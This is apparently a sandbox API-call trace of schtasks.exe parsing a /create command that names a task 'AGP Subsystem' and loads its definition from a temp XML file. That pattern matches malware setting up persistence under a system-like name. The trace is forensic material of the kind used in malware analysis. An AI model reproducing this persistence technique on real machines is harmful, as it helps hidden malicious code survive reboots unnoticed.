[0169.577] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|end|") returned 5
[0169.577] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.577] lstrlenW (lpString="|end|") returned 5
[0169.577] lstrlenW (lpString="|tn|") returned 4
[0169.577] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0
[0169.577] SetLastError (dwErrCode=0x490)
[0169.577] lstrlenW (lpString="showsid") returned 7
[0169.577] lstrlenW (lpString="showsid") returned 7
[0169.577] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.577] lstrlenW (lpString="tn") returned 2
[0169.578] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.578] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0xa, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|showsid|") returned 9
[0169.578] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.578] lstrlenW (lpString="|showsid|") returned 9
[0169.578] lstrlenW (lpString="|tn|") returned 4
[0169.578] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0
[0169.578] SetLastError (dwErrCode=0x490)
[0169.578] SetLastError (dwErrCode=0x490)
[0169.578] SetLastError (dwErrCode=0x0)
[0169.578] lstrlenW (lpString="/tn") returned 3
[0169.578] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0
[0169.578] SetLastError (dwErrCode=0x490)
[0169.578] SetLastError (dwErrCode=0x0)
[0169.578] lstrlenW (lpString="/tn") returned 3
[0169.578] GetProcessHeap () returned 0x2f0000
[0169.578] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x8) returned 0x306968
[0169.578] GetProcessHeap () returned 0x2f0000
[0169.578] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305358
[0169.578] SetLastError (dwErrCode=0x0)
[0169.578] SetLastError (dwErrCode=0x0)
[0169.578] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.578] lstrlenW (lpString="-/") returned 2
[0169.578] StrChrIW (lpStart="-/", wMatch=0x41) returned 0x0
[0169.578] SetLastError (dwErrCode=0x490)
[0169.579] SetLastError (dwErrCode=0x490)
[0169.579] SetLastError (dwErrCode=0x0)
[0169.579] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.579] StrChrIW (lpStart="AGP Subsystem", wMatch=0x3a) returned 0x0
[0169.579] SetLastError (dwErrCode=0x490)
[0169.579] SetLastError (dwErrCode=0x0)
[0169.579] lstrlenW (lpString="AGP Subsystem") returned 13
[0169.579] GetProcessHeap () returned 0x2f0000
[0169.579] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x1c) returned 0x303a80
[0169.579] GetProcessHeap () returned 0x2f0000
[0169.579] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305378
[0169.579] SetLastError (dwErrCode=0x0)
[0169.579] SetLastError (dwErrCode=0x0)
[0169.579] lstrlenW (lpString="/xml") returned 4
[0169.579] lstrlenW (lpString="-/") returned 2
[0169.579] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.579] lstrlenW (lpString="?") returned 1
[0169.579] lstrlenW (lpString="?") returned 1
[0169.579] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.579] lstrlenW (lpString="xml") returned 3
[0169.579] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.579] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|?|") returned 3
[0169.579] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.579] lstrlenW (lpString="|?|") returned 3
[0169.580] lstrlenW (lpString="|xml|") returned 5
[0169.580] SetLastError (dwErrCode=0x490)
[0169.580] lstrlenW (lpString="create") returned 6
[0169.580] lstrlenW (lpString="create") returned 6
[0169.580] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.580] lstrlenW (lpString="xml") returned 3
[0169.580] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.580] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.580] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.580] lstrlenW (lpString="|create|") returned 8
[0169.580] lstrlenW (lpString="|xml|") returned 5
[0169.580] StrStrIW (lpFirst="|create|", lpSrch="|xml|") returned 0x0
[0169.580] SetLastError (dwErrCode=0x490)
[0169.580] lstrlenW (lpString="delete") returned 6
[0169.580] lstrlenW (lpString="delete") returned 6
[0169.580] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.580] lstrlenW (lpString="xml") returned 3
[0169.580] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.580] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|delete|") returned 8
[0169.580] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.580] lstrlenW (lpString="|delete|") returned 8
[0169.580] lstrlenW (lpString="|xml|") returned 5
[0169.580] StrStrIW (lpFirst="|delete|", lpSrch="|xml|") returned 0x0
[0169.581] SetLastError (dwErrCode=0x490)
[0169.581] lstrlenW (lpString="query") returned 5
[0169.581] lstrlenW (lpString="query") returned 5
[0169.581] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.581] lstrlenW (lpString="xml") returned 3
[0169.581] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.581] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x8, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|query|") returned 7
[0169.581] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.581] lstrlenW (lpString="|query|") returned 7
[0169.581] lstrlenW (lpString="|xml|") returned 5
[0169.581] StrStrIW (lpFirst="|query|", lpSrch="|xml|") returned 0x0
[0169.581] SetLastError (dwErrCode=0x490)
[0169.581] lstrlenW (lpString="change") returned 6
[0169.581] lstrlenW (lpString="change") returned 6
[0169.581] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.581] lstrlenW (lpString="xml") returned 3
[0169.581] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.581] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|change|") returned 8
[0169.581] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.581] lstrlenW (lpString="|change|") returned 8
[0169.581] lstrlenW (lpString="|xml|") returned 5
[0169.581] StrStrIW (lpFirst="|change|", lpSrch="|xml|") returned 0x0
[0169.581] SetLastError (dwErrCode=0x490)
[0169.581] lstrlenW (lpString="run") returned 3
[0169.582] lstrlenW (lpString="run") returned 3
[0169.582] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.582] lstrlenW (lpString="xml") returned 3
[0169.582] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.582] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|run|") returned 5
[0169.582] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.582] lstrlenW (lpString="|run|") returned 5
[0169.582] lstrlenW (lpString="|xml|") returned 5
[0169.582] StrStrIW (lpFirst="|run|", lpSrch="|xml|") returned 0x0
[0169.582] SetLastError (dwErrCode=0x490)
[0169.582] lstrlenW (lpString="end") returned 3
[0169.582] lstrlenW (lpString="end") returned 3
[0169.582] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.582] lstrlenW (lpString="xml") returned 3
[0169.582] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.582] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|end|") returned 5
[0169.582] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.582] lstrlenW (lpString="|end|") returned 5
[0169.582] lstrlenW (lpString="|xml|") returned 5
[0169.582] StrStrIW (lpFirst="|end|", lpSrch="|xml|") returned 0x0
[0169.582] SetLastError (dwErrCode=0x490)
[0169.582] lstrlenW (lpString="showsid") returned 7
[0169.582] lstrlenW (lpString="showsid") returned 7
[0169.582] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.582] lstrlenW (lpString="xml") returned 3
[0169.583] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.583] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0xa, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|showsid|") returned 9
[0169.583] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|xml|") returned 5
[0169.583] lstrlenW (lpString="|showsid|") returned 9
[0169.583] lstrlenW (lpString="|xml|") returned 5
[0169.583] StrStrIW (lpFirst="|showsid|", lpSrch="|xml|") returned 0x0
[0169.583] SetLastError (dwErrCode=0x490)
[0169.583] SetLastError (dwErrCode=0x490)
[0169.583] SetLastError (dwErrCode=0x0)
[0169.583] lstrlenW (lpString="/xml") returned 4
[0169.583] StrChrIW (lpStart="/xml", wMatch=0x3a) returned 0x0
[0169.583] SetLastError (dwErrCode=0x490)
[0169.583] SetLastError (dwErrCode=0x0)
[0169.583] lstrlenW (lpString="/xml") returned 4
[0169.583] GetProcessHeap () returned 0x2f0000
[0169.583] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0xa) returned 0x304cb0
[0169.583] GetProcessHeap () returned 0x2f0000
[0169.583] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305398
[0169.583] SetLastError (dwErrCode=0x0)
[0169.583] SetLastError (dwErrCode=0x0)
[0169.583] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.583] lstrlenW (lpString="-/") returned 2
[0169.583] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0
[0169.583] SetLastError (dwErrCode=0x490)
[0169.583] SetLastError (dwErrCode=0x490)
[0169.583] SetLastError (dwErrCode=0x0)
[0169.584] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.584] StrChrIW (lpStart="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp", wMatch=0x3a) returned=":\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp"
[0169.584] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304ce0
[0169.584] _memicmp (_Buf1=0x304ce0, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0xc) returned 0x304cf8
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304d10
[0169.584] _memicmp (_Buf1=0x304d10, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x68) returned 0x306978
[0169.584] SetLastError (dwErrCode=0x7a)
[0169.584] SetLastError (dwErrCode=0x0)
[0169.584] SetLastError (dwErrCode=0x0)
[0169.584] lstrlenW (lpString="C") returned 1
[0169.584] SetLastError (dwErrCode=0x490)
[0169.584] SetLastError (dwErrCode=0x0)
[0169.584] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpFD29.tmp") returned 49
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x64) returned 0x3069e8
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3053b8
[0169.584] SetLastError (dwErrCode=0x0)
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.584] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306958) returned 1
[0169.584] GetProcessHeap () returned 0x2f0000
[0169.585] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306958) returned 0x6
[0169.585] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306958 | out: hHeap=0x2f0000) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305318) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305318) returned 0x14
[0169.585] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305318 | out: hHeap=0x2f0000) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306968) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306968) returned 0x8
[0169.585] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306968 | out: hHeap=0x2f0000) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305358) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305358) returned 0x14
[0169.585] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305358 | out: hHeap=0x2f0000) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x303a80) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.585] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x303a80) returned 0x1c
[0169.585] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x303a80 | out: hHeap=0x2f0000) returned 1
[0169.585] GetProcessHeap () returned 0x2f0000
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305378) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305378) returned 0x14
[0169.586] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305378 | out: hHeap=0x2f0000) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cb0) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304cb0) returned 0xa
[0169.586] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cb0 | out: hHeap=0x2f0000) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305398) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305398) returned 0x14
[0169.586] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305398 | out: hHeap=0x2f0000) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3069e8) returned 1
[0169.586] GetProcessHeap () returned 0x2f0000
[0169.586] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3069e8) returned 0x64
[0169.587] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3069e8 | out: hHeap=0x2f0000) returned 1
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3053b8) returned 1
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3053b8) returned 0x14
[0169.587] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3053b8 | out: hHeap=0x2f0000) returned 1
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2ff058) returned 1
[0169.587] GetProcessHeap () returned 0x2f0000
[0169.587] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2ff058) returned 0x10
[0169.587] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2ff058 | out: hHeap=0x2f0000) returned 1
[0169.588] SetLastError (dwErrCode=0x0)
[0169.588] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0169.588] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0169.588] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0169.588] VerifyVersionInfoW (in: lpVersionInformation=0x28cc3c, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x28cc3c) returned 1
[0169.588] SetLastError (dwErrCode=0x0)
[0169.588] lstrlenW (lpString="create") returned 6
[0169.588] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0169.588] SetLastError (dwErrCode=0x490)
[0169.588] SetLastError (dwErrCode=0x0)
[0169.588] lstrlenW (lpString="create") returned 6
[0169.588] GetProcessHeap () returned 0x2f0000
[0169.588] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3053b8
[0169.588] GetProcessHeap () returned 0x2f0000
[0169.588] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x2ff058
[0169.588] _memicmp (_Buf1=0x2ff058, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.588] GetProcessHeap () returned 0x2f0000
[0169.588] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x16) returned 0x305398
[0169.588] SetLastError (dwErrCode=0x0)
[0169.589] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.589] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x305a80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0169.589] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0169.589] GetProcessHeap () returned 0x2f0000
[0169.589] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x74e) returned 0x305c90
[0169.589] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x305c90 | out: lpData=0x305c90) returned 1
[0169.589] VerQueryValueW (in: pBlock=0x305c90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28cd44, puLen=0x28cd48 | out: lplpBuffer=0x28cd44*=0x30602c, puLen=0x28cd48) returned 1
[0169.589] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.589] _vsnwprintf (in: _Buffer=0x305a80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x28cd2c | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0169.589] VerQueryValueW (in: pBlock=0x305c90, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x28cd54, puLen=0x28cd50 | out: lplpBuffer=0x28cd54*=0x305e58, puLen=0x28cd50) returned 1
[0169.589] lstrlenW (lpString="schtasks.exe") returned 12
[0169.589] lstrlenW (lpString="schtasks.exe") returned 12
[0169.590] lstrlenW (lpString=".EXE") returned 4
[0169.590] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0169.590] lstrlenW (lpString="schtasks.exe") returned 12
[0169.590] lstrlenW (lpString=".EXE") returned 4
[0169.590] lstrlenW (lpString="schtasks") returned 8
[0169.590] lstrlenW (lpString="/create") returned 7
[0169.590] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.590] _vsnwprintf (in: _Buffer=0x305a80, _BufferCount=0x19, _Format="%s %s", _ArgList=0x28cd2c | out: _Buffer="schtasks /create") returned 16
[0169.590] _memicmp (_Buf1=0x304c68, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.590] GetProcessHeap () returned 0x2f0000
[0169.590] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305378
[0169.590] _memicmp (_Buf1=0x304c80, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.590] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x306718, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0169.590] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0169.590] GetProcessHeap () returned 0x2f0000
[0169.590] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x30) returned 0x3069e8
[0169.590] _vsnwprintf (in: _Buffer=0x306670, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x28cd30 | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37
[0169.590] GetProcessHeap () returned 0x2f0000
[0169.590] GetProcessHeap () returned 0x2f0000
[0169.590] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305c90) returned 1
[0169.590] GetProcessHeap () returned 0x2f0000
[0169.590] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305c90) returned 0x74e
[0169.591] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305c90 | out: hHeap=0x2f0000) returned 1
[0169.591] SetLastError (dwErrCode=0x0)
[0169.591] GetThreadLocale () returned 0x409
[0169.591] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.591] lstrlenW (lpString="create") returned 6
[0169.591] GetThreadLocale () returned 0x409
[0169.591] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.591] lstrlenW (lpString="?") returned 1
[0169.591] GetThreadLocale () returned 0x409
[0169.591] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.591] lstrlenW (lpString="s") returned 1
[0169.591] GetThreadLocale () returned 0x409
[0169.591] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.591] lstrlenW (lpString="u") returned 1
[0169.591] GetThreadLocale () returned 0x409
[0169.591] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.591] lstrlenW (lpString="p") returned 1
[0169.591] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="ru") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="rp") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="sc") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="mo") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="d") returned 1
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="m") returned 1
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="i") returned 1
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="tn") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="tr") returned 2
[0169.592] GetThreadLocale () returned 0x409
[0169.592] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.592] lstrlenW (lpString="st") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="sd") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="ed") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="it") returned 2
[0169.593] GetThreadLocale () returned 0x409
[0169.593] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.593] lstrlenW (lpString="et") returned 2
[0169.593] GetThreadLocale () returned 0x409
